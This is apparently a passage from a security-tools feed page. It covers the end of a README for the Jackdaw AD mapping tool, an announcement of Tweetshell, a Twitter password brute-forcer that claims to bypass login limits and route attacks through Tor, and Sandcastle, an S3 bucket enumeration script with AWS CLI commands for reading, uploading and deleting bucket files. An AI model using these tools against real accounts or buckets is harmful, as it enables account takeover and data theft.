  2. the controls you are using might change in the future (most likely)
  3. (worst part) The database design is not necessary suitable for future requests so it may change. There will be no effort to maintain backwards compatibility with experimental-phase DB structure!

Technical part

Database backend
Jackdaw uses SQLAlchemy ORM module, which gives you the option to use any SQL DB backend you like. The tests are mainly done on SQLite for ovbious reasons. There will be no backend-specific commands used in this project that would limit you.

Building the UI
THIS IS ONLY NEEDED IF YOU INSTALL VIA GIT AND/OR CHANGE SOMETHING IN THE UI CODE
The UI was written in React. Before first use/installation you have to build it. For this, you will need nodejs and npm installed. Then:
  1. Go to jackdaw/nest/site/nui
  2. Run npm install
  3. Run npm run build
Once done with the above, the UI is ready to play with.

Kudos
"If I have seen further it is by standing on the shoulders of Giants."

For the original idea
BloodHound team

For the ACL edge calculation
@dirkjanm (https://github.com/dirkjanm/)

For the awesome UI
Zsolt Imre (https://github.com/keymandll)

For the data collection parts
please see kudos section in aiosmb and msldap modules

In case I forgot to mention someone pls send a PR


Tweetshell - Multi-thread Twitter BruteForcer In Shell Script

$
0
0

Tweetshell is an Shell Script to perform multi-threaded brute force attack against Twitter, this script can bypass login limiting and it can test infinite number of passwords with a rate of +400 passwords/min using 20 threads.

Legal disclaimer:
Usage of TweetShell for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

Features
  • Multi-thread (400 pass/min, 20 threads)
  • Save/Resume sessions
  • Anonymous attack through TOR
  • Default password list (best +39k 8 letters)
  • Check valid username
  • Check and Install all dependencies

Usage:
git clone https://github.com/thelinuxchoice/tweetshell
cd tweetshell
chmod +x tweetshell.sh
service tor start
sudo ./tweetshell.sh

Install requirements (Curl, Tor):
chmod +x install.sh
sudo ./install.sh

Author: github.com/thelinuxchoice
IG: instagram.com/thelinuxchoice


Sandcastle - A Python Script For AWS S3 Bucket Enumeration

$
0
0

Inspired by a conversation with Instacart's @nickelser on HackerOne, I've optimised and published Sandcastle – a Python script for AWS S3 bucket enumeration, formerly known as bucketCrawler.
The script takes a target's name as the stem argument (e.g. shopify) and iterates through a file of bucket name permutations, such as the ones below:
-training
-bucket
-dev
-attachments
-photos
-elasticsearch
[...]

Getting started
Here's how to get started:
  1. Clone this repo (PyPi distribution temporarily disabled).
  2. Run sandcastle.py with a target name and input file (grab an example from this repo)
  3. Matching bucket permutations will be identified, and read permissions tested.
usage: sandcastle.py [-h] -t targetStem [-f inputFile]

arguments:
-h, --help show this help message and exit
-t targetStem, --target targetStem
Select a target stem name (e.g. 'shopify')
-f inputFile, --file inputFile
Select a bucket permutation file (default: bucket-
names.txt)
   ____             __             __  __
/ __/__ ____ ___/ /______ ____ / /_/ /__
_\ \/ _ `/ _ \/ _ / __/ _ `(_-</ __/ / -_)
/___/\_,_/_//_/\_,_/\__/\_,_/___/\__/_/\__/

S3 bucket enumeration // release v1.2.4 // ysx


[*] Commencing enumeration of 'shopify', reading 138 lines from 'bucket-names.txt'.

[+] Checking potential match: shopify-content --> 403

An error occurred (AccessDenied) when calling the ListObjects operation: Access Denied

Status codes and testing
Status codeDefinitionNotes
404Bucket Not FoundNot a target for analysis (hidden by default)
403Access DeniedPotential target for analysis via the CLI
200Publicly AccessiblePotential target for analysis via the CLI

AWS CLI commands
Here's a quick reference of some useful AWS CLI commands:
  • List Files: aws s3 ls s3://bucket-name
  • Download Files: aws s3 cp s3://bucket-name/<file> <destination>
  • Upload Files: aws s3 cp/mv test-file.txt s3://bucket-name
  • Remove Files: aws s3 rm s3://bucket-name/test-file.txt

What is S3?
From the Amazondocumentation, Working with Amazon S3 Buckets:
Amazon S3 [Simple Storage Service] is cloud storage for the Internet. To upload your data (photos, videos, documents etc.), you first create a bucket in one of the AWS Regions. You can then upload any number of objects to the bucket.
In terms of implementation, buckets and objects are resources, and Amazon S3 provides APIs for you to manage them.

Closing remarks
  • This is my first public security project. Sandcastle is published under the MIT License.
  • Usage acknowlegements:
    • Castle (icon) by Andrew Doane from the Noun Project
    • Nixie One (logo typeface) free by Jovanny Lemonad


Viewing all 5816 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>